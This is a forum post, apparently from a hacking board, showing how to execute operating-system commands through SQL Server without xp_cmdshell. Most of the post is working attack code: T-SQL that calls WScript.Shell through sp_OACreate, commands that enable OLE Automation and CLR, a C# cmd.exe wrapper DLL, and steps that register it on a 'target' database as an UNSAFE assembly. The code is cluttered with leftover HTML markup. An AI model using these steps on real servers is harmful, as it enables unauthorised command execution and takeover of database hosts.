SQL Server does not have xp_cmdshell to execute commands

enhackapt

Administrator
Staff member
Joined
Dec 10, 2024
Messages
21

Executing commands using COM​

(The Ole Automation Procedures component needs to be enabled)


declare @luan <span>int</span>,@exec <span>int</span>,@text <span>int</span>,@str varchar(<span>8000 </span>);<br><span>exec</span> sp_oacreate <span>'{72C24DD5-D70A-438B-8A42-98424B88AFB8}'</span>,@luan output;<br><span>exec</span> sp_oamethod @luan,<span>'exec'</span> ,@exec output,<span>'C:\\Windows\\System32\\cmd.exe /c whoami'</span>;<br><span>exec</span> sp_oamethod @exec, <span>'StdOut'</span>, @text out;<br><span>exec</span> sp_oamethod @text, <span>'readall'</span>, @str out;<br><span>select</span> @str;<br>



SQL Server does not have xpcmdshell to execute commands-1.png





If Ole Automation Procedures is not enabled, you can use the following command to enable


<span>sp_configure</span> <span>'show advanced options'</span>, <span>1</span>;<br><span>GO< /span><br>RECONFIGURE;<br><span>GO</span><br>sp_configure <span>'Ole Automation Procedures'</span>, <span>1</span>;<br><span>GO</span><br>RECONFIGURE;<br><span>GO</span><br>

Writing language: C#
VsCreate class library


<span> using</span> System;<br><span>using</span> System.Collections.Generic;<br><span>using</span> System.Linq;<br><span>using</span> System.Text;<br><span>using</span> System;<br><span>using</span> System.Threading.Tasks;<br><br><span>namespace</span> <span>shellexec</span><br>{<br> <span>public</span> <span>class</span > <span>exec</span><br> {<br> <span><span>public</span> <span>static</span> <span>string</span> <span>cmd</span>(<span><span>string</span> command</span>)<br> </span>{<br> System.Diagnostics.Process pro = <span>new</ span> System.Diagnostics.Process();<br> pro.StartInfo.FileName = <span>"cmd.exe"</span>;<br> pro.StartInfo.UseShellExecute = <span>false</span>;<br> pro.StartInfo.RedirectStandardError = <span>true</span>; <span>//Standard error</span><br> pro.StartInfo.RedirectStandardInput = <span>true</span>; <span>//Standard input</span>< br> pro.StartInfo.RedirectStandardOutput = <span>true</span>; <span>//Standard output</span><br> pro.StartInfo.CreateNoWindow = <span>true</span>; <span>/ /Whether to start the process in a new window</span><br> pro.Start();<br> pro.StandardInput.WriteLine(command + <span>"&&exit"</span>); <span> //Command parameter writing</span><br> pro.StandardInput.AutoFlush = <span>true</span>; <span>//Buffer is automatically refreshed</span><br> <span>string</span> span> output = pro.StandardOutput.ReadToEnd(); <span>//Read the execution result</span><br> pro.WaitForExit(); <span>//Wait for execution to complete and exit</span><br> pro.Close( );<br> <span>return</span> output.ToString();<br> }<br> }<br>}<br><br>


After generating the dll, you can use the hex method to write to the target, Or upload via shell. Then start constructing
1. The target database instance needs to enable clr integration


<span>exec</span> sp_configure <span>'clr enabled'</span>,1;--Enable CLR in SQL Server<br>reconfigure;<br>go<br>

2.The trusted property of the target database needs to be set to false. You can use the following statement to enable it


<span>ALTER</span> <span>DATABASE</span> [<Database name>] <span>SET</span> TRUSTWORTHY <span>ON</span><br>

3.Register DLL in the database


<span>CREATE</span> <span>ASSEMBLY</span> MySqlCLR <span>FROM</span> <span>'<dll的路径>'</span> //MySqlCLR is the variable name after importing dll<br>

4.Create a function
(construct the corresponding parameter type according to the parameter of the corresponding function type, and then remember to set RETURNS [nvarchar] (max) to return the maximum if it returns a string type), and directly name the dll in that namespace, class, and function)


<span>CREATE</span> <span>FUNCTION</span> [dbo].[cmd2] <br>( <br> @cmd <span>AS</span> <span>NVARCHAR</span>(<span>max</span>)<br>) <br><span>RETURNS</span> [<span>nvarchar</span>] (<span>max</span>) <span>WITH</span> <span>EXECUTE</span> <span>AS</span> CALLER<br><span>AS</span> <br><span>EXTERNAL</span> <span>NAME</span> [MySqlCLR].[shellexec.exec].cmd //shellexec is the namespace, exec is the class name, cmd is the function name<br><span>GO</span>

<br> access, otherwise an error will be reported during deployment


<span>ALTER</span> <span>ASSEMBLY</span> [MySqlCLR]<br><span>WITH</span> PERMISSION_SET = <span>UNSAFE</span><br>

6. Call stored procedures and function methods


select [<span>dbo</span>].[<span>cmd2</span>](<span>'whoami'</span>)<br>



SQL Server does not have xpcmdshell to execute commands-2.png







SQL Server does not have xpcmdshell to execute commands-3.png




Reference links:
https://blog.csdn.net/catchme_439/article/details/78411009
https://zhuanlan.zhihu.com/p/33322584?from_voters_page=true
 
Back
Top